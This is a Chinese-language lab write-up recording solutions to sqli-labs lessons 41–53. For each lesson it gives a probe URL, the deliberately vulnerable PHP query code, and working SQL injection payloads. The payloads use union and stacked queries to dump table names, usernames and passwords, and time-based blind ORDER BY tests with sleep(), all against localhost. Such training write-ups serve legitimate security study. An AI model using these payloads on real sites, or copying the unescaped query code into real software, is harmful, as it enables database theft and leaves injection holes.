SQLI-LAB 的 实战记录(Less 41 - Less 53)
来源:互联网 发布:模拟人生4男性捏脸数据 编辑:程序博客网 时间:2024/05/22 00:24
- Less - 41 stacked Query Intiger type blind
- Test
- Sourse Code
- Solution
- Less - 42 Stacked Query error based
- Test
- Sourse Code
- Solution
- Less - 43 stacked Query String type
- Test
- Sourse Code
- Solution
- Less - 44 Stacked Query blind
- Test
- Sourse Code
- Solution
- Less - 45 Stacked Query Blind based twist
- Test
- Sourse Code
- Solution
- Less - 46 ORDER BY-Error-Numeric
- Test
- Sourse Code
- Solution
- Less - 47 ORDER BY Clause-Error-Single quote
- Test
- Sourse Code
- Solution
- Less - 48 ORDER BY Clause Blind based
- Test
- Sourse Code
- Solution
- Less - 49 ORDER BY Clause Blind based
- Test
- Sourse Code
- Solution
- Less - 50 ORDER BY Clause Blind based
- Test
- Sourse Code
- Solution
- Less - 51 ORDER BY Clause Blind based
- Test
- Sourse Code
- Solution
- Less - 52 ORDER BY Clause Blind based
- Test
- Sourse Code
- Solution
- Less - 53 ORDER BY Clause Blind based
- Test
- Sourse Code
- Solution
以下内容 只是 本人 在做 sqli-lab 练习时 写下的记录,仅供参考。
因为本人学过一些sql注入的内容,所以大部分内容是没有讲解的,如有不清楚的地方,请自行使用搜索引擎查询,相信会得到所需的内容。
Less - 41 stacked Query Intiger type blind
(第41节:层次化查询 数字型 盲注 )
Test:
http://localhost/sqli-lab/Less-41/index.php?id=1'
注:有问题但不显示报错信息
Sourse Code:
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";if (mysqli_multi_query($con1, $sql)){ if ($result = mysqli_store_result($con1)){ if($row = mysqli_fetch_row($result)){ printf("Your Username is : %s", $row[1]); printf("Your Password is : %s", $row[2]); } } if (mysqli_more_results($con1)) { }}
Solution:
http://localhost/sqli-lab/Less-41/index.php?id=0 or 1=1 %23 其它: http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,version(),database() %23 http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23 http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23
Less - 42 Stacked Query error based
(第42节:层次化查询 基于错误)
Test:
http://localhost/sqli-lab/Less-42/index.php login_user=admin&login_password=11'&mysubmit=login
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”11”’ at line 1
注:password周围是单引号
Sourse Code:
$username = mysqli_real_escape_string($con1,$_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";if (@mysqli_multi_query($con1, $sql)){/* store first result set */ if($result = @mysqli_store_result($con1)){ if($row = @mysqli_fetch_row($result)){ if ($row[1]){ return $row[1]; }else{ return 0; } } }else{ echo '<font size="5" color= "#FFFF00">'; print_r(mysqli_error($con1)); echo "</font>"; }}else{ echo '<font size="5" color= "#FFFF00">'; print_r(mysqli_error($con1)); echo "</font>"; }
Solution:
login_user=admin&login_password=1' or '1'='1&mysubmit=login 其它: login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 43 stacked Query String type
(第43节:层次化查询 字符类型)
Test:
http://localhost/sqli-lab/Less-43/index.php login_user=admin&login_password=11'&mysubmit=login
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”11”)’ at line 1
注:password周围是单引号
Sourse Code:
$username = mysqli_real_escape_string($con1,$_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";if (@mysqli_multi_query($con1, $sql)){if($result = @mysqli_store_result($con1)){ if($row = @mysqli_fetch_row($result)){ if ($row[1]){ return $row[1]; }else{ return 0; } }}else{ print_r(mysqli_error($con1));}}else{ print_r(mysqli_error($con1)); }
Solution:
login_user=admin&login_password=1') or ('1')=('1&mysubmit=login 其它: login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 44 Stacked Query blind
(第44节:层次化查询 盲注)
Test:
http://localhost/sqli-lab/Less-44/index.php login_user=admin&login_password=0'&mysubmit=login
注:没有显示报错信息
Sourse Code:
$username = mysqli_real_escape_string($con1,$_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";if (@mysqli_multi_query($con1, $sql)){ if($result = @mysqli_store_result($con1)){ if($row = @mysqli_fetch_row($result)){ if ($row[1]){ return $row[1]; }else{ return 0; } } }}
Solution:
login_user=admin&login_password=1' or '1'='1&mysubmit=login 其它: login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 45 Stacked Query Blind based twist
(第45节:层次化查询 基于盲注 变形 )
Test:
http://localhost/sqli-lab/Less-45/index.php login_user=admin&login_password=0'&mysubmit=login
注:没有显示报错信息
Sourse Code:
$username = mysqli_real_escape_string($con1, $_POST["login_user"]);$password = $_POST["login_password"];$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";if (@mysqli_multi_query($con1, $sql)){ if($result = @mysqli_store_result($con1)){ if($row = @mysqli_fetch_row($result)){ if ($row[1]){ return $row[1]; }else{ return 0; } } }}
Solution:
login_user=admin&login_password=1') or ('1')=('1&mysubmit=login 其它: login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
Less - 46 ORDER BY-Error-Numeric
(第46节:GET - 基于错误 - 数字型 - ORDER BY 从句)
Test:
http://localhost/sqli-lab/Less-46/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
注:数字型
http://localhost/sqli-lab/Less-46/index.php?sort=1+asc http://localhost/sqli-lab/Less-46/index.php?sort=1+desc
注: 可以通过asc 和desc查看返回数据是否相同来简单判断是否存在orderby注入
Sourse Code:
$sql = "SELECT * FROM users ORDER BY $id";$result = mysql_query($sql);if ($result){ while ($row = mysql_fetch_assoc($result)){ echo $row['id']; echo $row['username']; echo $row['password']; } }else{ print_r(mysql_error()); }
Solution:
http://localhost/sqli-lab/Less-46/index.php?sort=1 and if(1=1, sleep(1), null) 其它: http://localhost/sqli-lab/Less-46/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null) http://localhost/sqli-lab/Less-46/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 47 ORDER BY Clause-Error-Single quote
(第47节:ORDER BY 从句 - 基于错误-单引号 )
Test:
http://localhost/sqli-lab/Less-47/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1
注:sort周围是单引号
Sourse Code:
$sql = "SELECT * FROM users ORDER BY '$id'";$result = mysql_query($sql);if ($result){ while ($row = mysql_fetch_assoc($result)){ echo $row['id']; echo $row['username']; echo $row['password']; } }else{ print_r(mysql_error());}
Solution:
http://localhost/sqli-lab/Less-47/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1 其它: http://localhost/sqli-lab/Less-47/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1 http://localhost/sqli-lab/Less-47/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 48 ORDER BY Clause Blind based
(第48节:ORDER BY 从句 基于盲注 )
Test:
http://localhost/sqli-lab/Less-48/index.php?sort=1' http://localhost/sqli-lab/Less-48/index.php?sort=1" http://localhost/sqli-lab/Less-48/index.php?sort=1') http://localhost/sqli-lab/Less-48/index.php?sort=1")
注:均没有显示报错信息
Sourse Code:
$sql = "SELECT * FROM users ORDER BY $id";$result = mysql_query($sql);if ($result){ while ($row = mysql_fetch_assoc($result)){ echo $row['id']; echo $row['username']; echo $row['password']; } }
Solution:
http://localhost/sqli-lab/Less-48/index.php?sort=1 and if(1=1, sleep(1), null) 其它: http://localhost/sqli-lab/Less-48/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null) http://localhost/sqli-lab/Less-48/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 49 ORDER BY Clause Blind based
(第49节:ORDER BY 从句 基于盲注 )
Test:
http://localhost/sqli-lab/Less-49/index.php?sort=1'
注:没有显示报错信息
http://localhost/sqli-lab/Less-49/index.php?sort=1"
注:正常,再结合上一条,sort周围是单引号
Sourse Code:
$sql = "SELECT * FROM users ORDER BY '$id'";$result = mysql_query($sql);if ($result){ while ($row = mysql_fetch_assoc($result)){ echo $row['username']; echo $row['password']; } }
Solution:
http://localhost/sqli-lab/Less-49/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1 其它: http://localhost/sqli-lab/Less-49/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1 http://localhost/sqli-lab/Less-49/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 50 ORDER BY Clause Blind based
(第50节:ORDER BY 从句 基于盲注)
Test:
http://localhost/sqli-lab/Less-50/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1
注:数字型
Sourse Code:
$sql="SELECT * FROM users ORDER BY $id";if (mysqli_multi_query($con1, $sql)){ if ($result = mysqli_store_result($con1)){ while($row = mysqli_fetch_row($result)){ printf("%s", $row[0]); printf("%s", $row[1]); printf("%s", $row[2]); } }}else{ print_r(mysqli_error($con1));}
Solution:
http://localhost/sqli-lab/Less-50/index.php?sort=1 and if(1=1, sleep(1), null) 其它: http://localhost/sqli-lab/Less-50/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null) http://localhost/sqli-lab/Less-50/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 51 ORDER BY Clause Blind based
(第51节:ORDER BY 从句 基于盲注 )
Test:
http://localhost/sqli-lab/Less-51/index.php?sort=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”1”’ at line 1
注:sort周围是单引号
Sourse Code:
$sql="SELECT * FROM users ORDER BY '$id'";if (mysqli_multi_query($con1, $sql)){ if ($result = mysqli_store_result($con1)){ while($row = mysqli_fetch_row($result)){ printf("%s", $row[0]); printf("%s", $row[1]); printf("%s", $row[2]); } }}else{ print_r(mysqli_error($con1));}
Solution:
http://localhost/sqli-lab/Less-51/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1 其它: http://localhost/sqli-lab/Less-51/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1 http://localhost/sqli-lab/Less-51/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
Less - 52 ORDER BY Clause Blind based
(第52节:ORDER BY 从句 基于盲注 )
Test:
http://localhost/sqli-lab/Less-52/index.php?sort=1' http://localhost/sqli-lab/Less-52/index.php?sort=1" http://localhost/sqli-lab/Less-52/index.php?sort=1') http://localhost/sqli-lab/Less-52/index.php?sort=1")
注:均没有显示报错信息
Sourse Code:
$sql="SELECT * FROM users ORDER BY $id";if (mysqli_multi_query($con1, $sql)){ if ($result = mysqli_store_result($con1)){ while($row = mysqli_fetch_row($result)){ printf("%s", $row[0]); printf("%s", $row[1]); printf("%s", $row[2]); } }}
Solution:
http://localhost/sqli-lab/Less-52/index.php?sort=1 and if(1=1, sleep(1), null) 其它: http://localhost/sqli-lab/Less-52/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null) http://localhost/sqli-lab/Less-52/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)
Less - 53 ORDER BY Clause Blind based
(第53节:ORDER BY 从句 基于盲注 )
Test:
http://localhost/sqli-lab/Less-53/index.php?sort=1'
注:没有显示报错信息
http://localhost/sqli-lab/Less-53/index.php?sort=1"
注:正常,再结合上一条,sort周围是单引号
Sourse Code:
$sql="SELECT * FROM users ORDER BY '$id'";if (mysqli_multi_query($con1, $sql)) { if ($result = mysqli_store_result($con1)){ while($row = mysqli_fetch_row($result)){ printf("%s", $row[0]); printf("%s", $row[1]); printf("%s", $row[2]); } }}
Solution:
http://localhost/sqli-lab/Less-53/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1 其它: http://localhost/sqli-lab/Less-53/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1 http://localhost/sqli-lab/Less-53/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
- SQLI-LAB 的 实战记录(Less 41 - Less 53)
- SQLI-LAB 的 实战记录(Less 1 - Less 10)
- SQLI-LAB 的 实战记录(Less 11 - Less 20)
- SQLI-LAB 的 实战记录(Less 21 - Less 30)
- SQLI-LAB 的 实战记录(Less 31 - Less 40)
- SQLI-LAB 的 实战记录(Less 54 - Less 65)
- sqli-labs ---- Less-2
- sqli-labs ---- Less-7
- sqli-labs ---- Less-5 & Less-6
- sqli-labs ---- Less-1 & Less-3 & Less-4
- sqli-labs ---- Less-8 & Less-9 & Less-10
- sqli-labs ---- Less-8 & Less-9 & Less-10
- [sqli-labs]Less-1(明注)
- SQLi-Labs 学习笔记(Less 41-50)
- 【SQL注入之sqli-labs】Less 1
- 【SQL注入之sqli-labs】Less 6
- less
- less
- codeforces 699B One Bomb
- 浅谈 CSS 清除浮动的 6 种方法(转)
- RPM包rpmbuild SPEC文件
- POJ-1797 Heavy Transportation
- 从服务器上传和下载文件方法
- SQLI-LAB 的 实战记录(Less 41 - Less 53)
- thinkphp框架命名规范
- 使用 webpack + react + redux + es6 开发组件化前端项目
- [MDX]Fact Table和Dimension Table
- git是什么
- 自定义控件其实很简单3/12
- Zabbix学习笔记(四)---使用微信报警
- 47 大结局 不用加减乘除做加法
- 银行IT系统 -整体架构